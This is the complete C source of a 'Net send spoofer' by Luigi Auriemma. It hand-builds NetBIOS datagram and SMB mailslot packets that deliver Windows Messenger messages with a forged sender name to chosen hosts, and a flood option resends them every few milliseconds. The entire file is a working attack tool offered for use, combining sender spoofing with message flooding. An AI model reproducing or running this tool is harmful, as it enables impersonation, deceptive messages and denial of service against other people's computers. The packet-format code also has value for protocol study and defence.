/*
    Copyright 2005,2006 Luigi Auriemma

    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307 USA

    http://www.gnu.org/licenses/gpl.txt
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <ctype.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define usleep  sleep
    #define ONEMS   1
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>
    #define ONEMS   1000
#endif



#define VER     "0.2.1"
#define BUFFSZ  1024    // 594 is the MAX!!!
#define PORT    138
#define MSGSZ   424



int mycpy(u_char *dst, u_char *src);
int netbios_name(u_char *name, u_char *out);
char *ip2host(char *ipc);
u_int resolv(char *host);
void std_err(void);



#pragma pack(1)
struct netbios_s {
    u_char  type;
    u_char  flags;
    u_short id;
    u_int   ip;
    u_short port;
    u_short len;
    u_short off;
} *netbios;

struct smb_s {
    u_char  component[4];
    u_char  command;
    u_char  error_class;
    u_char  reserved;
    u_short error_code;
    u_char  flags;
    u_short flags2;
    u_short id_high;
    u_char  sign[8];
    u_short reserved2;
    u_short tree_id;
    u_short proc_id;
    u_short user_id;
    u_short multiplex_id;
} *smb;

struct trans_s {
    u_char  word_count;
    u_short tot_par_count;
    u_short tot_data_count;
    u_short max_par_count;
    u_short max_data_count;
    u_char  max_setup_count;
    u_char  reserved;
    u_short flags;
    u_int   timeout;
    u_short reserved2;
    u_short par_count;
    u_short par_off;
    u_short data_count;
    u_short data_off;
    u_char  setup_count;
    u_char  reserved3;
    u_short setup[3];   // fixed for speed
    u_short byte_count;
} *trans;
#pragma pack()



int main(int argc, char *argv[]) {
    FILE    *fd;
    struct  sockaddr_in peer;
    int     sd,
            i,
            tmp,
            msglen,
            on = 1,
            flooding  = -1;
    u_char  buff[BUFFSZ + 1],
            msg[MSGSZ + 1],
            *data,
            *source,
            *dest,
            *destcomma,
            *destname = NULL,
            *msgfile  = NULL,
            *p,
            *l;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif


    setbuf(stdout, NULL);

    fputs("\n"
        "Net send spoofer (Netbios-free version) "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 3) {
        printf("\n"
            "Usage: %s [options] <source> <dest[,dest1...N]> [message]\n"
            "\n"
            "-f FILE  loads the message from the file FILE\n"
            "-x MS    flooding, will be sent a message each MS milliseconds\n"
            "-n NAME  while <dest> is mainly used for specifying the destination hostname\n"
            "         or IP, sometimes you could need to specify a different Netbios name.\n"
            "         Consider this option only for broadcast and domain messages or for\n"
            "         other situations where the Netbios name nad the hostname differs\n"
            "\n", argv[0]);
        exit(1);
    }

    for(i = 1; i < argc; i++) {
        if(argv[i][0] != '-') break;
        switch(argv[i][1]) {
            case 'f': msgfile  = argv[++i];         break;
            case 'x': flooding = atoi(argv[++i]);   break;
            case 'n': destname = argv[++i];         break;
            default: {
                printf("\nError: wrong command-line argument (%s)\n\n", argv[i]);
                exit(1);
                } break;
        }
    }

    if((argc - i) < 2) {
        printf("\nError: you have not specified the source and destination hosts\n\n");
        exit(1);
    }

    source = argv[i++];
    dest   = argv[i++];

    p = msg;
    if(argc - i) {
        while(i < argc) {
            p += mycpy(p, argv[i]);
            *(p - 1) = ' ';
            i++;
        }
        *(p - 1) = 0;
    } else if(msgfile) {
        printf("- open file %s\n", msgfile);
        fd = fopen(msgfile, "rb");
        if(!fd) std_err();
        msglen = fread(p, 1, sizeof(msg) - 1, fd);
        p[msglen] = 0;
        fclose(fd);
    } else {
        msglen = MSGSZ;
        fputs("- type your message and then put a single dot (.) for sending it:\n", stdout);
        fflush(stdin);
        while(fgets(p, msglen, stdin)) {
            for(l = p; *l && (*l != '\n') && (*l != '\r'); l++);
            *l = 0;
            if(!strcmp(p, ".")) break;
            p = l;
            *p++ = '\r';
            *p++ = '\n';
            msglen = MSGSZ - (p - msg);
        }
        *p = 0;
    }

redo:
    destcomma = strchr(dest, ',');
    if(destcomma) *destcomma = 0;

    p = strrchr(dest, '\\');    // useless
    if(p) dest = p + 1;

    peer.sin_addr.s_addr = resolv(dest);
    peer.sin_port        = htons(PORT);
    peer.sin_family      = AF_INET;

    dest = ip2host(dest);       // here is faster than above

    p = buff;
    netbios = (struct netbios_s *)p;

    netbios->type  = 17;
    netbios->flags = 0xe;
    netbios->id    = htons(time(NULL));
    netbios->ip    = peer.sin_addr.s_addr;
    netbios->port  = htons(PORT);
//  netbios->len   = htons();
    netbios->off   = htons(0);

    p += sizeof(struct netbios_s);
    p += netbios_name(source, p);                       // source name
    p += netbios_name(destname ? destname : dest, p);   // destination name
    smb = (struct smb_s *)p;

    memcpy(smb->component, "\xff" "SMB", 4);
    smb->command      = 0x25;
    smb->error_class  = 0;
    smb->reserved     = 0;
    smb->error_code   = 0;
    smb->flags        = 0x18;
    smb->flags2       = 0x0400;
    smb->id_high      = 0;
    memset(smb->sign, 0, 8);
    smb->reserved2    = 0;
    smb->tree_id      = 0xffff;
    smb->proc_id      = time(NULL) >> 8;
    smb->user_id      = 0xffff;
    smb->multiplex_id = 0;

    p += sizeof(struct smb_s);
    trans = (struct trans_s *)p;

    trans->word_count      = 17;    // 14 + setup_count
    trans->tot_par_count   = 0;
//  trans->tot_data_count  = ;
    trans->max_par_count   = 0;
    trans->max_data_count  = 0;
    trans->max_setup_count = 0;
    trans->reserved        = 0;
    trans->flags           = 2;
    trans->timeout         = 0;
    trans->reserved2       = 0;
    trans->par_count       = 0;
    trans->par_off         = 88;
//  trans->data_count      = ;
    trans->data_off        = 88;
    trans->setup_count     = 3;
    trans->reserved3       = 0;
    trans->setup[0]        = 1; // opcode
    trans->setup[1]        = 0; // priority
    trans->setup[2]        = 2; // class
//  trans->byte_count      = ;

    p += sizeof(struct trans_s);
    data = p;
    p += mycpy(p, "\\MAILSLOT\\MESSNGR");
    if((p - buff) & 1) *p++ = 0;

    tmp = p - data;

    p += mycpy(p, source);
    p += mycpy(p, destname ? destname : dest);
    p += mycpy(p, msg);

    trans->tot_data_count  = (p - data) - tmp;
    trans->data_count      = (p - data) - tmp;
    trans->byte_count      = p - data;

    netbios->len   = htons((p - buff) - sizeof(struct netbios_s));

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();
    setsockopt(sd, SOL_SOCKET, SO_BROADCAST, (char *)&on, sizeof(on));

sendmsg:
    if(sendto(sd, buff, p - buff, 0, (struct sockaddr *)&peer, sizeof(peer))
      < 0) std_err();

    if(flooding >= 0) {
        fputc('.', stdout);
        usleep(flooding * ONEMS);
        goto sendmsg;
    }

    close(sd);
    printf("- spoofed message sent to %s (%s)\n", dest, inet_ntoa(peer.sin_addr));

    if(destcomma) {
        dest = destcomma + 1;
        goto redo;
    }

    return(0);
}



int mycpy(u_char *dst, u_char *src) {
    u_char  *base = dst;

    while(*src) {
        *dst++ = *src++;
    }
    *dst++ = 0;     // NULL included
    return(dst - base);
}



int netbios_name(u_char *name, u_char *out) {
    int     i;
    u_char  *out_base = out;

#define ADDENC(x)   memcpy(out, x, 2);

    *out++ = ' ';
    for(i = 0; name[i]; i++) {
        switch(toupper(name[i])) {
            case 'A': ADDENC("EB"); break;
            case 'B': ADDENC("EC"); break;
            case 'C': ADDENC("ED"); break;
            case 'D': ADDENC("EE"); break;
            case 'E': ADDENC("EF"); break;
            case 'F': ADDENC("EG"); break;
            case 'G': ADDENC("EH"); break;
            case 'H': ADDENC("EI"); break;
            case 'I': ADDENC("EJ"); break;
            case 'J': ADDENC("EK"); break;
            case 'K': ADDENC("EL"); break;
            case 'L': ADDENC("EM"); break;
            case 'M': ADDENC("EN"); break;
            case 'N': ADDENC("EO"); break;
            case 'O': ADDENC("EP"); break;
            case 'P': ADDENC("FA"); break;
            case 'Q': ADDENC("FB"); break;
            case 'R': ADDENC("FC"); break;
            case 'S': ADDENC("FD"); break;
            case 'T': ADDENC("FE"); break;
            case 'U': ADDENC("FF"); break;
            case 'V': ADDENC("FG"); break;
            case 'W': ADDENC("FH"); break;
            case 'X': ADDENC("FI"); break;
            case 'Y': ADDENC("FJ"); break;
            case 'Z': ADDENC("FK"); break;
            case '0': ADDENC("DA"); break;
            case '1': ADDENC("DB"); break;
            case '2': ADDENC("DC"); break;
            case '3': ADDENC("DD"); break;
            case '4': ADDENC("DE"); break;
            case '5': ADDENC("DF"); break;
            case '6': ADDENC("DG"); break;
            case '7': ADDENC("DH"); break;
            case '8': ADDENC("DI"); break;
            case '9': ADDENC("DJ"); break;
            case ' ': ADDENC("CA"); break;
            case '!': ADDENC("CB"); break;
            case '"': ADDENC("CC"); break;
            case '#': ADDENC("CD"); break;
            case '$': ADDENC("CE"); break;
            case '%': ADDENC("CF"); break;
            case '&': ADDENC("CG"); break;
            case '\'': ADDENC("CH"); break;
            case '(': ADDENC("CI"); break;
            case ')': ADDENC("CJ"); break;
            case '*': ADDENC("CK"); break;
            case '+': ADDENC("CL"); break;
            case ',': ADDENC("CM"); break;
            case '-': ADDENC("CN"); break;
            case '.': ADDENC("CO"); break;
            case '=': ADDENC("DN"); break;
            case ':': ADDENC("DK"); break;
            case ';': ADDENC("DL"); break;
            case '@': ADDENC("EA"); break;
            case '^': ADDENC("FO"); break;
            case '_': ADDENC("FP"); break;
            case '{': ADDENC("HL"); break;
            case '}': ADDENC("HN"); break;
            case '~': ADDENC("HO"); break;
            default:  ADDENC("CA"); break;  // ???
        }
        out += 2;
    }

    for(; i < 15; i++) {
        ADDENC("CA");
        out += 2;
    }
    ADDENC("AA");
    out += 2;
    *out++ = 0;

#undef ADDENC

    return(out - out_base);
}



char *ip2host(char *ipc) {
    struct  hostent *h;
    u_int   ip;

    if(isalpha(ipc[0])) return(ipc);
    ip = inet_addr(ipc);
    if(ip == INADDR_NONE) return(ipc);
    h = gethostbyaddr((u_char *)&ip, 4, AF_INET);
    if(!h) return(ipc);
    return(h->h_name);
}



u_int resolv(char *host) {
    struct  hostent *hp;
    u_int   host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u_int *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


